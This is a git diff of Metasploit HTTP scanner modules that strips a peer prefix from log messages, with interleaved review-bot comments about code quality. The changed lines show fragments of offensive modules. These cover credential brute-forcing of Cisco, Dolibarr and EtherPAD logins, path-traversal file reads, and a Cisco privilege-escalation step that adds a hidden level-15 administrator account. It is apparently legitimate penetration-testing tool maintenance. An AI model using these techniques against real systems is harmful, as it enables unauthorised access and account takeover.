b/modules/auxiliary/scanner/http/apache_mod_cgi_bash_env.rb index 6c0b87c217..d7add8ec02 100644 --- a/modules/auxiliary/scanner/http/apache_mod_cgi_bash_env.rb +++ b/modules/auxiliary/scanner/http/apache_mod_cgi_bash_env.rb 
@@ -93,7 +93,7 @@ class Metasploit4 < Msf::Auxiliary res = req(datastore['CMD'], datastore['CVE']) if res && res.body =~ /#{marker}(.+)#{marker}/m - print_good("#{peer} - #{$1}") + print_good("#{$1}") report_vuln( :host => ip, :port => rport, diff --git a/modules/auxiliary/scanner/http/bitweaver_overlay_type_traversal.rb b/modules/auxiliary/scanner/http/bitweaver_overlay_type_traversal.rb index 21e93ce9b1..dbaf72cd7e 100644 --- a/modules/auxiliary/scanner/http/bitweaver_overlay_type_traversal.rb +++ b/modules/auxiliary/scanner/http/bitweaver_overlay_type_traversal.rb @@ -53,7 +53,7 @@ class Metasploit3 < Msf::Auxiliary fname = datastore['FILE'] fname = fname[1, fname.length] if fname =~ /^\// - print_status("#{peer} - Reading '#{datastore['FILE']}'") + print_status("Reading '#{datastore['FILE']}'") traverse = "../" * datastore['DEPTH'] res = send_request_cgi({ 'method' => 'GET', @@ -65,13 +65,13 @@ class Metasploit3 < Msf::Auxiliary }) if res and res.code == 200 and res.body =~ /failed to open stream\: No such file/ - print_error("#{peer} - Cannot read '#{fname}'. File does not exist.") + print_error("Cannot read '#{fname}'. File does not exist.") elsif res and res.code == 200 and res.body =~ /failed to open stream\: Permission denied/ - print_error("#{peer} - Cannot read '#{fname}'. Permission denied.") + print_error("Cannot read '#{fname}'. Permission denied.") elsif res and res.code == 200 and res.body =~ /Failed opening required/ - print_error("#{peer} - Cannot read '#{fname}'. Possibly not vulnerable.") + print_error("Cannot read '#{fname}'. Possibly not vulnerable.") elsif res and res.code == 200 data = res.body @@ -86,10 +86,10 @@ class Metasploit3 < Msf::Auxiliary ) vprint_line(data) - print_good("#{peer} - #{datastore['FILE']} stored as '#{p}'") + print_good("#{datastore['FILE']} stored as '#{p}'") else - print_error("#{peer} - Request failed due to some unknown reason") + print_error("Request failed due to some unknown reason") end end 
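Review bot: With the prefix gone, `print_good("#{$1}")` in the `@@ -93,7` hunk interpolates a single value into an otherwise empty string. Pass the capture directly and name it, `print_good(Regexp.last_match(1))`, which also avoids the implicit global. The captured text comes from the response body between the markers, so a short comment like `# command output as returned by the target, printed verbatim` would tell the next reader that this line is remote-controlled content. The enclosing method starts and ends outside the hunk.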
diff --git a/modules/auxiliary/scanner/http/cisco_asa_asdm.rb b/modules/auxiliary/scanner/http/cisco_asa_asdm.rb index f9c8611e68..0264d5b855 100644 --- a/modules/auxiliary/scanner/http/cisco_asa_asdm.rb +++ b/modules/auxiliary/scanner/http/cisco_asa_asdm.rb @@ -38,18 +38,18 @@ class Metasploit3 < Msf::Auxiliary def run_host(ip) unless check_conn? - print_error("#{peer} - Connection failed, Aborting...") + print_error("Connection failed, Aborting...") return end unless is_app_asdm? - print_error("#{peer} - Application does not appear to be Cisco ASA ASDM. Module will not continue.") + print_error("Application does not appear to be Cisco ASA ASDM. Module will not continue.") return end - print_status("#{peer} - Application appears to be Cisco ASA ASDM. Module will continue.") + print_status("Application appears to be Cisco ASA ASDM. Module will continue.") - print_status("#{peer} - Starting login brute force...") + print_status("Starting login brute force...") each_user_pass do |user, pass| do_login(user, pass) end @@ -63,7 +63,7 @@ class Metasploit3 < Msf::Auxiliary 'uri' => '/', 'method' => 'GET' }) - print_good("#{peer} - Server is responsive...") + print_good("Server is responsive...") rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Rex::ConnectionError, ::Errno::EPIPE return end @@ -117,7 +117,7 @@ class Metasploit3 < Msf::Auxiliary # Brute-force the login page def do_login(user, pass) - vprint_status("#{peer} - Trying username:#{user.inspect} with password:#{pass.inspect}") + vprint_status("Trying username:#{user.inspect} with password:#{pass.inspect}") begin res = send_request_cgi({ 'uri' => '/+webvpn+/index.html', 
@@ -138,17 +138,17 @@ class Metasploit3 < Msf::Auxiliary res.body.match(/Success/) && res.body.match(/success/) - print_good("#{peer} - SUCCESSFUL LOGIN - #{user.inspect}:#{pass.inspect}") + print_good("SUCCESSFUL LOGIN - #{user.inspect}:#{pass.inspect}") report_cred(ip: rhost, port: rport, user: user, password: pass, proof: res.body) return :next_user else - vprint_error("#{peer} - FAILED LOGIN - #{user.inspect}:#{pass.inspect}") + vprint_error("FAILED LOGIN - #{user.inspect}:#{pass.inspect}") end rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Rex::ConnectionError, ::Errno::EPIPE - print_error("#{peer} - HTTP Connection Failed, Aborting") + print_error("HTTP Connection Failed, Aborting") return :abort end end diff --git a/modules/auxiliary/scanner/http/cisco_ssl_vpn.rb b/modules/auxiliary/scanner/http/cisco_ssl_vpn.rb index 5ad7ed6458..0a1537b49f 100644 --- a/modules/auxiliary/scanner/http/cisco_ssl_vpn.rb +++ b/modules/auxiliary/scanner/http/cisco_ssl_vpn.rb 
@@ -42,28 +42,28 @@ class Metasploit3 < Msf::Auxiliary def run_host(ip) unless check_conn? - vprint_error("#{peer} - Connection failed, Aborting...") + vprint_error("Connection failed, Aborting...") return false end unless is_app_ssl_vpn? - vprint_error("#{peer} - Application does not appear to be Cisco SSL VPN. Module will not continue.") + vprint_error("Application does not appear to be Cisco SSL VPN. Module will not continue.") return false end - vprint_good("#{peer} - Application appears to be Cisco SSL VPN. Module will continue.") + vprint_good("Application appears to be Cisco SSL VPN. Module will continue.") groups = Set.new if datastore['GROUP'].empty? - vprint_status("#{peer} - Attempt to Enumerate VPN Groups...") + vprint_status("Attempt to Enumerate VPN Groups...") groups = enumerate_vpn_groups if groups.empty? - vprint_warning("#{peer} - Unable to enumerate groups") - vprint_warning("#{peer} - Using the default group: DefaultWEBVPNGroup") + vprint_warning("Unable to enumerate groups") + vprint_warning("Using the default group: DefaultWEBVPNGroup") groups << "DefaultWEBVPNGroup" else - vprint_good("#{peer} - Enumerated VPN Groups: #{groups.to_a.join(", ")}") + vprint_good("Enumerated VPN Groups: #{groups.to_a.join(", ")}") end else @@ -71,7 +71,7 @@ class Metasploit3 < Msf::Auxiliary end groups << "" - vprint_status("#{peer} - Starting login brute force...") + vprint_status("Starting login brute force...") groups.each do |group| each_user_pass do |user, pass| do_login(user, pass, group) @@ -83,7 +83,7 @@ class Metasploit3 < Msf::Auxiliary def check_conn? begin res = send_request_cgi('uri' => '/', 'method' => 'GET') - vprint_good("#{peer} - Server is responsive...") + vprint_good("Server is responsive...") rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, 
@@ -187,7 +187,7 @@ class Metasploit3 < Msf::Auxiliary # Brute-force the login page def do_login(user, pass, group) - vprint_status("#{peer} - Trying username:#{user.inspect} with password:#{pass.inspect} and group:#{group.inspect}") + vprint_status("Trying username:#{user.inspect} with password:#{pass.inspect} and group:#{group.inspect}") begin cookie = "webvpn=; " + @@ -221,7 +221,7 @@ class Metasploit3 < Msf::Auxiliary resp.body.match(/SSL VPN Service/) && resp.body.match(/webvpn_logout/i) - print_good("#{peer} - SUCCESSFUL LOGIN - #{user.inspect}:#{pass.inspect}:#{group.inspect}") + print_good("SUCCESSFUL LOGIN - #{user.inspect}:#{pass.inspect}:#{group.inspect}") do_logout(resp.get_cookies) @@ -230,7 +230,7 @@ class Metasploit3 < Msf::Auxiliary return :next_user else - vprint_error("#{peer} - FAILED LOGIN - #{user.inspect}:#{pass.inspect}:#{group.inspect}") + vprint_error("FAILED LOGIN - #{user.inspect}:#{pass.inspect}:#{group.inspect}") end rescue ::Rex::ConnectionRefused, @@ -238,7 +238,7 @@ class Metasploit3 < Msf::Auxiliary ::Rex::ConnectionTimeout, ::Rex::ConnectionError, ::Errno::EPIPE - vprint_error("#{peer} - HTTP Connection Failed, Aborting") + vprint_error("HTTP Connection Failed, Aborting") return :abort end end diff --git a/modules/auxiliary/scanner/http/cisco_ssl_vpn_priv_esc.rb b/modules/auxiliary/scanner/http/cisco_ssl_vpn_priv_esc.rb index acb1737c39..513c8217b1 100644 --- a/modules/auxiliary/scanner/http/cisco_ssl_vpn_priv_esc.rb +++ b/modules/auxiliary/scanner/http/cisco_ssl_vpn_priv_esc.rb @@ -53,7 +53,7 @@ class Metasploit3 < Msf::Auxiliary 'method' => 'GET' ) - vprint_good("#{peer} - Server is responsive") + vprint_good("Server is responsive") rescue ::Rex::ConnectionError, ::Errno::EPIPE return false end @@ -91,7 +91,7 @@ class Metasploit3 < Msf::Auxiliary if res && res.code == 200 - vprint_good("#{peer} - Logged out") + vprint_good("Logged out") end end 
@@ -117,8 +117,8 @@ class Metasploit3 < Msf::Auxiliary resp.body.include?('Cisco Adaptive Security Appliance Software Version') return resp.body else - vprint_error("#{peer} - Unable to run '#{command}'") - vprint_good("#{peer} - Retrying #{i} '#{command}'") unless i == 2 + vprint_error("Unable to run '#{command}'") + vprint_good("Retrying #{i} '#{command}'") unless i == 2 end end @@ -130,18 +130,18 @@ class Metasploit3 < Msf::Auxiliary password = Rex::Text.rand_text_alphanumeric(20) tries.times do |i| - vprint_good("#{peer} - Attemping to add User: #{username}, Pass: #{password}") + vprint_good("Attemping to add User: #{username}, Pass: #{password}") command = "username #{username} password #{password} privilege 15" resp = run_command(command, cookie) if resp && !resp.body.include?('Command authorization failed') && !resp.body.include?('Command failed') - vprint_good("#{peer} - Privilege Escalation Appeared Successful") + vprint_good("Privilege Escalation Appeared Successful") return [username, password] else - vprint_error("#{peer} - Unable to run '#{command}'") - vprint_good("#{peer} - Retrying #{i} '#{command}'") unless i == tries - 1 + vprint_error("Unable to run '#{command}'") + vprint_good("Retrying #{i} '#{command}'") unless i == tries - 1 end end @@ -181,7 +181,7 @@ class Metasploit3 < Msf::Auxiliary resp.body.include?('SSL VPN Service') && resp.body.include?('webvpn_logout') - vprint_good("#{peer} - Logged in with User: #{datastore['USERNAME']}, Pass: #{datastore['PASSWORD']} and Group: #{datastore['GROUP']}") + vprint_good("Logged in with User: #{datastore['USERNAME']}, Pass: #{datastore['PASSWORD']} and Group: #{datastore['GROUP']}") return resp.get_cookies else return false @@ -195,7 +195,7 @@ class Metasploit3 < Msf::Auxiliary def run_host(ip) # Validate we're dealing with Cisco SSL VPN unless validate_cisco_ssl_vpn - vprint_error("#{peer} - Does not appear to be Cisco SSL VPN") + vprint_error("Does not appear to be Cisco SSL VPN") return end 
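Review bot: The retry notice in the `@@ -117,8` hunk is suppressed with a hard-coded last index, `unless i == 2`, while the matching line in the `@@ -130,18` hunk of the same file uses `unless i == tries - 1`. If the loop bound here is ever changed, the final failed attempt will announce a retry that never happens, or an earlier one will stay silent. The loop header is outside the hunk, so the bound is inferred; I would derive the index from it as the other method does. A retry notice also reads better as `vprint_status` than `vprint_good`.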
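Review bot: Two of the rewritten messages in cisco_ssl_vpn_priv_esc.rb still carry typos: `Attemping to add User` in the `@@ -130,18` hunk and `Failed to created user account` in the `@@ -235,11` hunk. Since both lines are being touched anyway, I would correct them to `Attempting to add User: ...` and `Failed to create user account on Cisco SSL VPN`. Anyone searching console logs for these events otherwise has to match the misspelling.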
@@ -203,7 +203,7 @@ class Metasploit3 < Msf::Auxiliary # interimittent based on session, so we'll just retry # 'X' times. datastore['RETRIES'].times do |i| - vprint_good("#{peer} - Exploit Attempt ##{i}") + vprint_good("Exploit Attempt ##{i}") # Authenticate to SSL VPN and get session cookie cookie = do_login( @@ -214,7 +214,7 @@ class Metasploit3 < Msf::Auxiliary # See if our authentication attempt failed unless cookie - vprint_error("#{peer} - Failed to login to Cisco SSL VPN") + vprint_error("Failed to login to Cisco SSL VPN") next end @@ -223,10 +223,10 @@ class Metasploit3 < Msf::Auxiliary if version && version_match = version.match(/Cisco Adaptive Security Appliance Software Version ([\d+\.\(\)]+)/) - print_good("#{peer} - Show version succeeded. Version is Cisco ASA #{version_match[1]}") + print_good("Show version succeeded. Version is Cisco ASA #{version_match[1]}") else do_logout(cookie) - vprint_error("#{peer} - Show version failed") + vprint_error("Show version failed") next end @@ -235,11 +235,11 @@ class Metasploit3 < Msf::Auxiliary do_logout(cookie) if creds - print_good("#{peer} - Successfully added level 15 account #{creds.join(", ")}") + print_good("Successfully added level 15 account #{creds.join(", ")}") user, pass = creds report_escalated_creds(user, pass) else - vprint_error("#{peer} - Failed to created user account on Cisco SSL VPN") + vprint_error("Failed to created user account on Cisco SSL VPN") end end end diff --git a/modules/auxiliary/scanner/http/clansphere_traversal.rb b/modules/auxiliary/scanner/http/clansphere_traversal.rb index a351f737aa..3878ced5cd 100644 --- a/modules/auxiliary/scanner/http/clansphere_traversal.rb +++ b/modules/auxiliary/scanner/http/clansphere_traversal.rb @@ -47,7 +47,7 @@ class Metasploit3 < Msf::Auxiliary peer = "#{ip}:#{rport}" - print_status("#{peer} - Reading '#{datastore['FILE']}'") + print_status("Reading '#{datastore['FILE']}'") traverse = "../" * datastore['DEPTH'] f = datastore['FILE'] 
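Review bot: The context line `peer = "#{ip}:#{rport}"` in the `@@ -47,7` hunk of clansphere_traversal.rb looks like dead code after this change, because every message in the three visible hunks of this file has dropped `#{peer}`. The local presumably also shadows the `peer` helper that the other modules call without defining it. If nothing outside the hunks reads the variable, delete the assignment. The method continues outside the hunk, so that needs checking against the full file.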
@@ -60,7 +60,7 @@ class Metasploit3 < Msf::Auxiliary }) if res and res.body =~ /^Fatal error\:/ - print_error("#{peer} - Unable to read '#{datastore['FILE']}', possibily because:") + print_error("Unable to read '#{datastore['FILE']}', possibily because:") print_error("\t1. File does not exist.") print_error("\t2. No permission.") print_error("\t3. #{ip} isn't vulnerable to null byte poisoning.") @@ -78,10 +78,10 @@ class Metasploit3 < Msf::Auxiliary ) vprint_line(data) - print_good("#{peer} - #{fname} stored as '#{p}'") + print_good("#{fname} stored as '#{p}'") else - print_error("#{peer} - Fail to obtain file for some unknown reason") + print_error("Fail to obtain file for some unknown reason") end end diff --git a/modules/auxiliary/scanner/http/dolibarr_login.rb b/modules/auxiliary/scanner/http/dolibarr_login.rb index 8acee32259..a121331058 100644 --- a/modules/auxiliary/scanner/http/dolibarr_login.rb +++ b/modules/auxiliary/scanner/http/dolibarr_login.rb @@ -90,11 +90,11 @@ class Metasploit3 < Msf::Auxiliary # sid, token = get_sid_token if sid.nil? or token.nil? - vprint_error("#{peer} - Unable to obtain session ID or token, cannot continue") + vprint_error("Unable to obtain session ID or token, cannot continue") return :abort else - vprint_status("#{peer} - Using sessiond ID: #{sid}") - vprint_status("#{peer} - Using token: #{token}") + vprint_status("Using sessiond ID: #{sid}") + vprint_status("Using token: #{token}") end begin 
@@ -114,22 +114,22 @@ class Metasploit3 < Msf::Auxiliary } }) rescue ::Rex::ConnectionError, Errno::ECONNREFUSED, Errno::ETIMEDOUT - vprint_error("#{peer} - Service failed to respond") + vprint_error("Service failed to respond") return :abort end if res.nil? - vprint_error("#{peer} - Connection timed out") + vprint_error("Connection timed out") return :abort end location = res.headers['Location'] if res and res.headers and (location = res.headers['Location']) and location =~ /admin\// - print_good("#{peer} - Successful login: \"#{user}:#{pass}\"") + print_good("Successful login: \"#{user}:#{pass}\"") report_cred(ip: rhost, port: rport, user: user, password: pass, proof: res.headers['Location']) return :next_user else - vprint_error("#{peer} - Bad login: \"#{user}:#{pass}\"") + vprint_error("Bad login: \"#{user}:#{pass}\"") return end end @@ -143,7 +143,7 @@ class Metasploit3 < Msf::Auxiliary def run_host(ip) each_user_pass { |user, pass| - vprint_status("#{peer} - Trying \"#{user}:#{pass}\"") + vprint_status("Trying \"#{user}:#{pass}\"") do_login(user, pass) } end diff --git a/modules/auxiliary/scanner/http/drupal_views_user_enum.rb b/modules/auxiliary/scanner/http/drupal_views_user_enum.rb index 56412ba3f2..04d650de51 100644 --- a/modules/auxiliary/scanner/http/drupal_views_user_enum.rb +++ b/modules/auxiliary/scanner/http/drupal_views_user_enum.rb @@ -56,7 +56,7 @@ class Metasploit3 < Msf::Auxiliary if res.body.include?('Access denied') # This probably means the Views Module actually isn't installed - print_error("#{peer} - Access denied") + print_error("Access denied") return Exploit::CheckCode::Safe elsif res.message != 'OK' || res.body != '[ ]' return Exploit::CheckCode::Safe @@ -122,7 +122,7 @@ class Metasploit3 < Msf::Auxiliary results << user_list.flatten.uniq end else - print_error("#{peer} - Unexpected results from server") + print_error("Unexpected results from server") return end end 
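Review bot: In the dolibarr_login.rb `@@ -114,22` hunk, `location = res.headers['Location']` is assigned and then assigned again inside the condition on the next line. The `res and res.headers` tests there are also redundant, because the `res.nil?` guard just above has already returned and the first assignment has already dereferenced `res.headers`. I would collapse the condition to `if location =~ /admin\//` and pass `proof: location` to report_cred. The method starts outside the hunk.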
diff --git a/modules/auxiliary/scanner/http/elasticsearch_traversal.rb b/modules/auxiliary/scanner/http/elasticsearch_traversal.rb index a521f753cf..58be3c1b0c 100644 --- a/modules/auxiliary/scanner/http/elasticsearch_traversal.rb +++ b/modules/auxiliary/scanner/http/elasticsearch_traversal.rb @@ -72,7 +72,7 @@ class Metasploit3 < Msf::Auxiliary travs << payload.gsub('/', '%2f') travs << file.gsub('/', '%2f') - vprint_status("#{peer} - Retrieving file contents...") + vprint_status("Retrieving file contents...") res = send_request_raw( 'method' => 'GET', @@ -89,10 +89,10 @@ class Metasploit3 < Msf::Auxiliary end def run_host(ip) - vprint_status("#{peer} - Checking if it's a vulnerable ElasticSearch") + vprint_status("Checking if it's a vulnerable ElasticSearch") check_code = check_host(ip) - print_status("#{peer} - #{check_code.second}") + print_status("#{check_code.second}") if check_host(ip) != Exploit::CheckCode::Appears return end @@ -102,7 +102,7 @@ class Metasploit3 < Msf::Auxiliary contents = read_file(filename) unless contents - print_error("#{peer} - No file downloaded") + print_error("No file downloaded") return end @@ -123,6 +123,6 @@ class Metasploit3 < Msf::Auxiliary fcontent, fname ) - print_good("#{peer} - File saved in: #{path}") + print_good("File saved in: #{path}") end end diff --git a/modules/auxiliary/scanner/http/etherpad_duo_login.rb b/modules/auxiliary/scanner/http/etherpad_duo_login.rb index 9da9bffde7..eccfdbc20d 100644 --- a/modules/auxiliary/scanner/http/etherpad_duo_login.rb +++ b/modules/auxiliary/scanner/http/etherpad_duo_login.rb @@ -32,7 +32,7 @@ class Metasploit3 < Msf::Auxiliary return end - print_status("#{peer} - Starting login bruteforce...") + print_status("Starting login bruteforce...") each_user_pass do |user, pass| do_login(user, pass) end 
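Review bot: run_host in the `@@ -89,10` hunk of elasticsearch_traversal.rb calls `check_host(ip)` twice, once to fill `check_code` and again in `if check_host(ip) != Exploit::CheckCode::Appears`. That repeats the probe against the target and lets the printed status and the decision disagree if the two responses differ. The condition should reuse the stored result: `return unless check_code == Exploit::CheckCode::Appears`. The interpolation in the new `print_status("#{check_code.second}")` is also redundant if that value is already a string. run_host continues outside the hunk.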
@@ -53,15 +53,15 @@ class Metasploit3 < Msf::Auxiliary } }) rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Rex::ConnectionError - vprint_error("#{peer} - HTTP Connection Failed...") + vprint_error("HTTP Connection Failed...") return false end if (res and res.code == 200 and res.headers['Server'].include?("EtherPAD") and res.body.include?("EtherPAD Duo")) - vprint_good("#{peer} - Running EtherPAD Duo application ...") + vprint_good("Running EtherPAD Duo application ...") return true else - vprint_error("#{peer} - Application is not EtherPAD Duo. Module will not continue.") + vprint_error("Application is not EtherPAD Duo. Module will not continue.") return false end end @@ -98,7 +98,7 @@ class Metasploit3 < Msf::Auxiliary # def do_login(user, pass) - vprint_status("#{peer} - Trying username:#{user.inspect} with password:#{pass.inspect}") + vprint_status("Trying username:#{user.inspect} with password:#{pass.inspect}") begin res = send_request_cgi( @@ -108,16 +108,16 @@ class Metasploit3 < Msf::Auxiliary 'authorization' => basic_auth(user, pass) }) rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Rex::ConnectionError, ::Errno::EPIPE - vprint_error("#{peer} - HTTP Connection Failed...") + vprint_error("HTTP Connection Failed...") return :abort end if res && res.code == 200 && res.body.include?("Home Page") && res.headers['Server'] && res.headers['Server'].include?("EtherPAD") - print_good("#{peer} - SUCCESSFUL LOGIN - #{user.inspect}:#{pass.inspect}") + print_good("SUCCESSFUL LOGIN - #{user.inspect}:#{pass.inspect}") report_cred(ip: rhost, port: rport, user: user, password: pass, proof: res.body) return :next_user else - vprint_error("#{peer} - FAILED LOGIN - #{user.inspect}:#{pass.inspect}") + vprint_error("FAILED LOGIN - #{user.inspect}:#{pass.inspect}") end end end 
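Review bot: The detection check in the `@@ -53,15` hunk calls `res.headers['Server'].include?("EtherPAD")` without testing that the header exists. A host that answers 200 with no Server header would raise NoMethodError there instead of being reported as not EtherPAD Duo. do_login in the `@@ -108,16` hunk already guards this with `res.headers['Server'] &&`, so I would use the same guard here, or `res.headers['Server'].to_s.include?("EtherPAD")`. The method starts outside the hunk.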
diff --git a/modules/auxiliary/scanner/http/f5_mgmt_scanner.rb b/modules/auxiliary/scanner/http/f5_mgmt_scanner.rb index 402c7dbdde..3bb9ab7c3b 100644 --- a/modules/auxiliary/scanner/http/f5_mgmt_scanner.rb +++ b/modules/auxiliary/scanner/http/f5_mgmt_scanner.rb @@ -42,13 +42,13 @@ class Metasploit3 < Msf::Auxiliary res = send_request_raw({'method' => 'GET', 'uri' => '/'}, datastore['TIMEOUT']) return true if res rescue ::Rex::ConnectionRefused - vprint_status("#{peer} - Connection refused") + vprint_status("Connection refused") return false rescue ::Rex::ConnectionError - vprint_error("#{peer} - Connection failed") + vprint_error("Connection failed") return false rescue ::OpenSSL::SSL::SSLError - vprint_error("#{peer} - SSL/TLS connection error") + vprint_error("SSL/TLS connection error") return false end end @@ -61,19 +61,19 @@ class Metasploit3 < Msf::Auxiliary # Detect BigIP management interface if res.body =~ /<title>BIG\-IP/ - print_good("#{peer} - F5 BigIP web management interface found") + print_good("F5 BigIP web management interface found") return end # Detect EM management interface if res.body =~ /<title>Enterprise Manager/ - print_good("#{peer} - F5 Enterprise Manager web management interface found") + print_good("F5 Enterprise Manager web management interface found") return end # Detect ARX management interface if res.body =~ /<title>F5 ARX Manager Login<\/title>/ - print_good("#{peer} - ARX web management interface found") + print_good("ARX web management interface found") return end end 
@@ -81,14 +81,14 @@ class Metasploit3 < Msf::Auxiliary # Detect BigIQ management interface res = send_request_raw('method' => 'GET', 'uri' => '/ui/login/') if res && res.code == 200 && res.body =~ /<title>BIG\-IQ/ - print_good("#{peer} - F5 BigIQ web management interface found") + print_good("F5 BigIQ web management interface found") return end # Detect FirePass management interface res = send_request_raw('method' => 'GET', 'uri' => '/admin/', 'rport' => rport) if res && res.code == 200 && res.body =~ /<br><br><br><big><b> FirePass/ - print_good("#{peer} - F5 FirePass web management interface found") + print_good("F5 FirePass web management interface found") return end end diff --git a/modules/auxiliary/scanner/http/gitlab_login.rb b/modules/auxiliary/scanner/http/gitlab_login.rb index 6217518937..46df091403 100644 --- a/modules/auxiliary/scanner/http/gitlab_login.rb +++ b/modules/auxiliary/scanner/http/gitlab_login.rb @@ -47,9 +47,9 @@ class Metasploit3 < Msf::Auxiliary ) if res && res.body && res.body.include?('user[email]') - vprint_status("#{peer} - GitLab v5 login page") + vprint_status("GitLab v5 login page") elsif res && res.body && res.body.include?('user[login]') - vprint_status("#{peer} - GitLab v7 login page") + vprint_status("GitLab v7 login page") else vprint_error('Not a valid GitLab login page') return diff --git a/modules/auxiliary/scanner/http/goahead_traversal.rb b/modules/auxiliary/scanner/http/goahead_traversal.rb index 0dd40c9e34..2fa77e2376 100644 --- a/modules/auxiliary/scanner/http/goahead_traversal.rb +++ b/modules/auxiliary/scanner/http/goahead_traversal.rb @@ -69,9 +69,9 @@ class Metasploit3 < Msf::Auxiliary fname ) - print_good("#{peer} - File saved in: #{path}") + print_good("File saved in: #{path}") else - print_error("#{peer} - Nothing was downloaded") + print_error("Nothing was downloaded") end end end 
diff --git a/modules/auxiliary/scanner/http/hp_imc_som_file_download.rb b/modules/auxiliary/scanner/http/hp_imc_som_file_download.rb index ec3c90c5c6..c4dbf3e12f 100644 --- a/modules/auxiliary/scanner/http/hp_imc_som_file_download.rb +++ b/modules/auxiliary/scanner/http/hp_imc_som_file_download.rb @@ -63,11 +63,11 @@ class Metasploit3 < Msf::Auxiliary def run_host(ip) unless is_imc_som? - vprint_error("#{peer} - HP iMC with the SOM component not found") + vprint_error("HP iMC with the SOM component not found") return end - vprint_status("#{peer} - Sending request...") + vprint_status("Sending request...") res = send_request_cgi({ 'uri' => normalize_uri("servicedesk", "servicedesk", "fileDownload"), 'method' => 'GET', @@ -89,9 +89,9 @@ class Metasploit3 < Msf::Auxiliary contents, fname ) - print_good("#{peer} - File saved in: #{path}") + print_good("File saved in: #{path}") else - vprint_error("#{peer} - Failed to retrieve file") + vprint_error("Failed to retrieve file") return end end diff --git a/modules/auxiliary/scanner/http/hp_sitescope_getfileinternal_fileaccess.rb b/modules/auxiliary/scanner/http/hp_sitescope_getfileinternal_fileaccess.rb index fa4557f956..39ff1efbeb 100644 --- a/modules/auxiliary/scanner/http/hp_sitescope_getfileinternal_fileaccess.rb +++ b/modules/auxiliary/scanner/http/hp_sitescope_getfileinternal_fileaccess.rb @@ -50,14 +50,14 @@ class Metasploit4 < Msf::Auxiliary @uri = normalize_uri(target_uri.path) @uri << '/' if @uri[-1,1] != '/' - print_status("#{peer} - Connecting to SiteScope SOAP Interface") + print_status("Connecting to SiteScope SOAP Interface") res = send_request_cgi({ 'uri' => "#{@uri}services/APISiteScopeImpl", 'method' => 'GET'}) if not res - print_error("#{peer} - Unable to connect") + print_error("Unable to connect") return end 
@@ -65,7 +65,7 @@ class Metasploit4 < Msf::Auxiliary end def accessfile - print_status("#{peer} - Retrieving the target hostname") + print_status("Retrieving the target hostname") data = "<?xml version='1.0' encoding='UTF-8'?>" + "\r\n" data << "<wsns0:Envelope" + "\r\n" @@ -107,11 +107,11 @@ class Metasploit4 < Msf::Auxiliary end if not host_name or host_name.empty? - print_error("#{peer} - Failed to retrieve the host name") + print_error("Failed to retrieve the host name") return end - print_status("#{peer} - Retrieving the file contents") + print_status("Retrieving the file contents") data = "<?xml version='1.0' encoding='UTF-8'?>" + "\r\n" data << "<wsns0:Envelope" + "\r\n" @@ -152,7 +152,7 @@ class Metasploit4 < Msf::Auxiliary boundary = $1 end if not boundary or boundary.empty? - print_error("#{peer} - Failed to retrieve the file contents") + print_error("Failed to retrieve the file contents") return end @@ -160,7 +160,7 @@ class Metasploit4 < Msf::Auxiliary cid = $1 end if not cid or cid.empty? - print_error("#{peer} - Failed to retrieve the file contents") + print_error("Failed to retrieve the file contents") return end @@ -168,17 +168,17 @@ class Metasploit4 < Msf::Auxiliary loot = Rex::Text.ungzip($1) end if not loot or loot.empty? - print_error("#{peer} - Failed to retrieve the file contents") + print_error("Failed to retrieve the file contents") return end f = ::File.basename(datastore['RFILE']) path = store_loot('hp.sitescope.file', 'application/octet-stream', rhost, loot, f, datastore['RFILE']) - print_status("#{peer} - #{datastore['RFILE']} saved in #{path}") + print_status("#{datastore['RFILE']} saved in #{path}") return end - print_error("#{peer} - Failed to retrieve the file contents") + print_error("Failed to retrieve the file contents") end end diff --git a/modules/auxiliary/scanner/http/hp_sitescope_getsitescopeconfiguration.rb b/modules/auxiliary/scanner/http/hp_sitescope_getsitescopeconfiguration.rb index e60872481f..028e951d5c 100644 
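Review bot: The guards in the `@@ -152,7`, `@@ -160,7` and `@@ -168,17` hunks all print the same `Failed to retrieve the file contents`, and so does the fall-through at the end. The operator therefore cannot tell whether `boundary`, `cid` or the gunzipped `loot` was the missing piece. Since these lines are being rewritten, I would make each one name what was not found, e.g. `print_error("Failed to retrieve the file contents (boundary not found)")`. The same pattern repeats in the hp_sitescope_getsitescopeconfiguration.rb hunks, and the enclosing method starts outside these hunks.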
--- a/modules/auxiliary/scanner/http/hp_sitescope_getsitescopeconfiguration.rb +++ b/modules/auxiliary/scanner/http/hp_sitescope_getsitescopeconfiguration.rb @@ -51,7 +51,7 @@ class Metasploit4 < Msf::Auxiliary @uri = normalize_uri(target_uri.path) @uri << '/' if @uri[-1,1] != '/' - print_status("#{peer} - Connecting to SiteScope SOAP Interface") + print_status("Connecting to SiteScope SOAP Interface") uri = normalize_uri(@uri, 'services/APISiteScopeImpl') @@ -60,7 +60,7 @@ class Metasploit4 < Msf::Auxiliary 'method' => 'GET'}) if not res - print_error("#{peer} - Unable to connect") + print_error("Unable to connect") return end @@ -84,7 +84,7 @@ class Metasploit4 < Msf::Auxiliary data << "</wsns0:Body>" + "\r\n" data << "</wsns0:Envelope>" - print_status("#{peer} - Retrieving the SiteScope Configuration") + print_status("Retrieving the SiteScope Configuration") uri = normalize_uri(@uri, 'services/APISiteScopeImpl') @@ -103,7 +103,7 @@ class Metasploit4 < Msf::Auxiliary boundary = $1 end if not boundary or boundary.empty? - print_error("#{peer} - Failed to retrieve the SiteScope Configuration") + print_error("Failed to retrieve the SiteScope Configuration") return end @@ -111,7 +111,7 @@ class Metasploit4 < Msf::Auxiliary cid = $1 end if not cid or cid.empty? - print_error("#{peer} - Failed to retrieve the SiteScope Configuration") + print_error("Failed to retrieve the SiteScope Configuration") return end 
